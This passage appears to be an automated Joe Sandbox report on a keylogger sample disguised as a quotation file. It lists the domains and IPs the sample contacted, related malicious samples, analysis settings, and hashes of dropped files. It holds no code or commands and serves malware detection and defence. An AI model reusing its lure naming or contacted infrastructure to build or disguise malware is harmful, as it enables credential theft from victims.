                      • Avira URL Cloud: safe
                      		unknown
                      http://nsis.sf.net/NSIS_Errorz1QuotationSheetVSAA6656776.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.google.com/zz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.comdz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.google.com/z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://reallyfreegeoip.org/xml/149.18.24.104$z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://reallyfreegeoip.orgdz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://reallyfreegeoip.orgz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.orgdz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://reallyfreegeoip.orgz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://support.google.com/chrome/?p=plugin_flashz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.quovadis.bm0z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.usercontent.google.com/z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.orgz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D69000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://apis.google.comz1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.comz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrorz1QuotationSheetVSAA6656776.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ocsp.quovadisoffshore.com0z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.org/dz1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namez1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://reallyfreegeoip.org/xml/z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      142.251.111.132
                      		drive.usercontent.google.comUnited States
                      		15169GOOGLEUSfalse
                      142.251.167.113
                      		drive.google.comUnited States
                      		15169GOOGLEUSfalse
                      158.101.44.242
                      		checkip.dyndns.comUnited States
                      		31898ORACLE-BMC-31898USfalse
                      172.67.177.134
                      		reallyfreegeoip.orgUnited States
                      		13335CLOUDFLARENETUStrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1480054
                      Start date and time:2024-07-24 14:42:36 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 16m 14s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                      Run name:Suspected Instruction Hammering
                      Number of analysed new started processes analysed:132
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:z1QuotationSheetVSAA6656776.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@408/13@4/4
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 169
                      • Number of non-executed functions: 118
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtWriteVirtualMemory calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: z1QuotationSheetVSAA6656776.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      158.101.44.242rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • checkip.dyndns.org/
                      rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                      • checkip.dyndns.org/
                      SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • checkip.dyndns.org/
                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                      • checkip.dyndns.org/
                      List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • checkip.dyndns.org/
                      Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                      • checkip.dyndns.org/
                      KQtHehIECg.exeGet hashmaliciousSnake KeyloggerBrowse
                      • checkip.dyndns.org/
                      Bank Slip.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • checkip.dyndns.org/
                      NATV0980090004.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • checkip.dyndns.org/
                      QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • checkip.dyndns.org/
                      172.67.177.134z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                        rSWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            z46PEDIDODECOMPRAURGENTE___F__D__P___.exeGet hashmaliciousSnake KeyloggerBrowse
                              z13FAT9654578987.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                GF87654000.BAT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  NOVO_PEDIDO_DE_COMPRA_____pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                    e-dekont.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                      U prilogu je nova lista narudzbi.exeGet hashmaliciousSnake KeyloggerBrowse
                                        list of items.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          checkip.dyndns.comrcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.247.73
                                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.247.73
                                          SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 132.226.8.169
                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                          • 193.122.6.168
                                          Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                          • 132.226.247.73
                                          List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 193.122.6.168
                                          Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          reallyfreegeoip.orgrcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.96.3
                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.96.3
                                          Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                          • 188.114.96.3
                                          List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 188.114.97.3
                                          Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.96.3
                                          SMLCHtAAMK.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ORACLE-BMC-31898USrcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.130.0
                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 193.122.6.168
                                          Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          SMLCHtAAMK.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 193.122.130.0
                                          KQtHehIECg.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          CLOUDFLARENETUSrcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          Fw PROPOSITION DE BELGOSUC.emlGet hashmaliciousSharepointPhisherBrowse
                                          • 188.114.97.3
                                          roquette.com PURCHASE ORDER.htmGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          ELECTRONIC RECEIPTGrba.htmlGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          https://www.canva.com/design/DAGL1KVwhx0/GKVImkBFgqHp2esQ4hZ4Gg/editGet hashmaliciousUnknownBrowse
                                          • 172.67.74.152
                                          Sync_Approval_Document.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          http://relsoftware.comGet hashmaliciousHTMLPhisherBrowse
                                          • 104.18.20.138
                                          25C1.exeGet hashmaliciousGlupteba, XmrigBrowse
                                          • 104.20.3.235
                                          https://forms.office.com/r/tV6LkCsNt1Get hashmaliciousUnknownBrowse
                                          • 104.18.36.155
                                          abrirpdf_45868.msiGet hashmaliciousHTMLPhisherBrowse
                                          • 172.67.150.91

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0ercrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 172.67.177.134
                                          roquette.com PURCHASE ORDER.htmGet hashmaliciousUnknownBrowse
                                          • 172.67.177.134
                                          nJC3400-GS SICO NEW ORLEANS.pif.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.177.134
                                          abrirpdf_45868.msiGet hashmaliciousHTMLPhisherBrowse
                                          • 172.67.177.134
                                          231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.177.134
                                          231210-04-AgentTesla-38a0d6.exeGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.177.134
                                          1E7BF321ECF78820F9422AD944E55288C5DBF0787DDAFD97120791A0DBBCE80A.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.177.134
                                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 172.67.177.134
                                          https://jf8nnsk.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=drarclimatizacao.com.br/dayo/tp5ri/VmFuZGVuYnVsY2tlLkFsZXhpc0BkZW1lLWdyb3VwLmNvbQ==$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                          • 172.67.177.134
                                          https://valid-check-tl-3.azurewebsites.netGet hashmaliciousUnknownBrowse
                                          • 172.67.177.134
                                          37f463bf4616ecd445d4a1937da06e19rRSFREVISEDINVOICE.exeGet hashmaliciousGuLoaderBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          rRSFREVISEDINVOICE.exeGet hashmaliciousGuLoaderBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          1f4ef767f0144f8b485bc6ef31247f6b95f68df95a649d9902f885e79408e114.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          1887D44BD913B81D9943F4B5637E01B057D20D757B23CD6EA3DA239827A9CD95.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          ykuOk5seZe.exeGet hashmaliciousUnknownBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          17C1844F37315D9081EFA1C39ABCDB3612C531DCF01C303425346DD352A3B117.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          17A21C03CDA1D7443CA4BEF3A410BC88B544B55E28088A3AE550AEBC517BEA35.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          1631E2571D7E0EBF784A263FE72777450189800806D145C4937492DFCB55F2D5.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          Ia93PTYivQ.exeGet hashmaliciousBlackMoon, NeshtaBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113
                                          vh6X1dStma.exeGet hashmaliciousUnknownBrowse
                                          • 142.251.111.132
                                          • 142.251.167.113

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dllCdB3FZ9vyI.exeGet hashmaliciousUnknownBrowse
                                            z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  Nondesistance.exeGet hashmaliciousGuLoaderBrowse
                                                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      FRA.0038222.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        Platosammine.exeGet hashmaliciousGuLoaderBrowse
                                                          FRA.0038222.exeGet hashmaliciousGuLoaderBrowse
                                                            C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dllz65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                SecuriteInfo.com.Gen.Variant.Nemesis.10604.10132.22073.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  SecuriteInfo.com.Gen.Variant.Nemesis.10604.10132.22073.exeGet hashmaliciousGuLoaderBrowse
                                                                    SecuriteInfo.com.Gen.Variant.Nemesis.10604.16795.26223.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      SecuriteInfo.com.Gen.Variant.Nemesis.10604.16795.26223.exeGet hashmaliciousGuLoaderBrowse
                                                                        SecuriteInfo.com.Gen.Variant.Nemesis.10604.26230.20747.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          SecuriteInfo.com.Gen.Variant.Nemesis.10604.19295.24537.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            SecuriteInfo.com.Gen.Variant.Nemesis.10604.26230.20747.exeGet hashmaliciousGuLoaderBrowse

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte\kitchen.und

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):569387
                                                                              Entropy (8bit):1.2576295922522882
                                                                              Encrypted:false
                                                                              SSDEEP:1536:OVASKUA3NpWyq9DZujnIJ+mokF0WzE4M9MeBELQiF6tPa:UUUAd8yqvy85w42MyIQiY
                                                                              MD5:AE1308833F720D75F2C304BE4B6AF6BD
                                                                              SHA1:0DCB3E7900E151ADDA29B07C1C46CEDFCB65555D
                                                                              SHA-256:288723F9781B40C4212C684938A065D765E21199CA8EDB7BBA3851120FB9B16D
                                                                              SHA-512:E2FC0EAFAA8DC2CAFC3C4007FE7BFEB6872A2DBAF620D6ECAC62F8E489C462748AF3685B1B822CB66A31EC425DEBFBF9BE4EEC7FA527F58607D4CB1B7FCBD256
                                                                              Malicious:false
                                                                              Preview:...............................................u......................................................K........................2...........o...............o.....................................2...........................................................7............................................................................$.....2.......................................................g..........................................................................................................h.....n............$.................................X.................................................=............E...........O....................................................................................................................................................................................................3................................................................................H...................................\.................................+...G.....L..............

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte\svalebajers.lde

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):517647
                                                                              Entropy (8bit):1.2525511679320935
                                                                              Encrypted:false
                                                                              SSDEEP:1536:RnfKh/fMno7kmNB/MVHaozk5pxqhdLSwP+j6v368E2fanzuM:gpfYJi9MgoA56duUfKZ
                                                                              MD5:6818DA35D99574965581C79EEF751091
                                                                              SHA1:97CBB5F773C5BC7E2079AF539C1A6309BFA6B101
                                                                              SHA-256:EAF29630020676A421E576BF3456B364B13C9F821A9817136F60F68F765E6869
                                                                              SHA-512:80CBEF3D59309B73E8126FA8CB9F5D781B7768D5E91C9232D648050B9F1A197EFC42689679545BD82C28ABA1D8EDE1247A656E2185552D7A1DE624BFBD564244
                                                                              Malicious:false
                                                                              Preview:..................................z............7.................................=......................K.................................................................................[....................................}.............L........................................................"...........................................................................u................................M......................................................P............................$.........................N..................................................^....................B......[.t...............2.....U..........,.................................n......................................f.........................../............................H....../...G.........Y.....|..................................................2.$....:............................7..............r......................................g..............O..+.......................................(..............

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Gendigtningens.cab

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):569548
                                                                              Entropy (8bit):1.2494786298549982
                                                                              Encrypted:false
                                                                              SSDEEP:768:kmzb0dG4lgsuXoSuHz6AHMS2yXGwBsRH5U7uzrN2R1pFGatwfoKCN73Ms+5CWiH7:k2bCuu2ylIScQ744CwWiFNXv4Lf6dz
                                                                              MD5:16EB64C7F3F4C4059920FCF08E836C66
                                                                              SHA1:E6315CC7261E67718C5C9E4ACAD98BF4122AD785
                                                                              SHA-256:6054328E283DB7F1F165C773DAC047B429179CB51E8B16E4D04131D4747245FE
                                                                              SHA-512:1304C1DBAE579A1CCD9F231A191F96B42C48C82ECB79AAE61CB8CE0F84BEB1A2359500E4E297653B343F4623FC3EFF21DCD0756890FDF221038AF187DB182D3C
                                                                              Malicious:false
                                                                              Preview:T....................(..........................!.X...............................................................................................%..m.|....._.......................P...........................................b......................................................................................................................................................................"...........................y................................................................3.................................................................................................................k........................................................................................*..........b................................................`..................................d.............................k.. ..c....A..............................$........[................................................'............^....@..e.,.................h..........................................

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Halmludningernes.Sur

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9485
                                                                              Entropy (8bit):4.720175957025076
                                                                              Encrypted:false
                                                                              SSDEEP:192:R5WX7IWhJa8zXbpuqlroIrz78j5hoi+vG:PBfyblrLz7K7++
                                                                              MD5:D13BD1AB08F91817D8E99CE3195C8ACF
                                                                              SHA1:73107E7AB1B790748F52DD1DEFA4CB9BAB00B4AF
                                                                              SHA-256:449D2FD5F91013745AC0E256DB5EB29FB1FE3B9FAB339A3C22484CD755D3D628
                                                                              SHA-512:6983719348F5799352621012C6F05035C033756214CCFCEEBA00495E6B534A63AE2FB191C66D53985E456A5C415D98F30E6012DEB53D63B1C9C2F0A639FDD531
                                                                              Malicious:false
                                                                              Preview:...n..ff..........JJ...aaaa.^^........m.......~.........>....\\.......22..................................................................................................................................................................................................................................................................C..........................o........''....gg.w....\\.R..........r...........55..$...........++.....!!..ee....`....yyyy.....=.jj.....@....1.....................PP...g.!............................................cc........++......^.....11...q.,,,,..<.....BB................^^^......ww.........{{{{{.E.....III..................l.................77...n................""""...............+..##....~._..................i........................=.........L.\\\\\....T..........).....2...!!...........................[..@@@..............qq.r.y....@@@...NNN........h...!!.........R.ll.........................bb......k.D............

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Sammenbindende.Hos41

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):146499
                                                                              Entropy (8bit):7.7927314794736535
                                                                              Encrypted:false
                                                                              SSDEEP:3072:9tRR+B7BTwOqysKul+0C5vD0C4lYGsfsjoyX572jF/WxYhDJrI99VeM:9tREUTJK+bCpdL5yXc/hDJrINeM
                                                                              MD5:8F81EC4D5FD356697EAB164400D97904
                                                                              SHA1:6CC7424F756436A8A7638462CB3D08DC8BF32A3C
                                                                              SHA-256:084BA80FFEAA2B5FD048D280AE0EFFB5192E94C7E4A8362008681B2F69AB49C1
                                                                              SHA-512:F9A3891EA4D763FA4BB51EF9208433370851FA1A77CC65A04A3216DC3EA7EEA9B2A1F0D5D84601BE73E89A7A0C823B63A8AA514A7016D0FBD8CEF66E0699A357
                                                                              Malicious:false
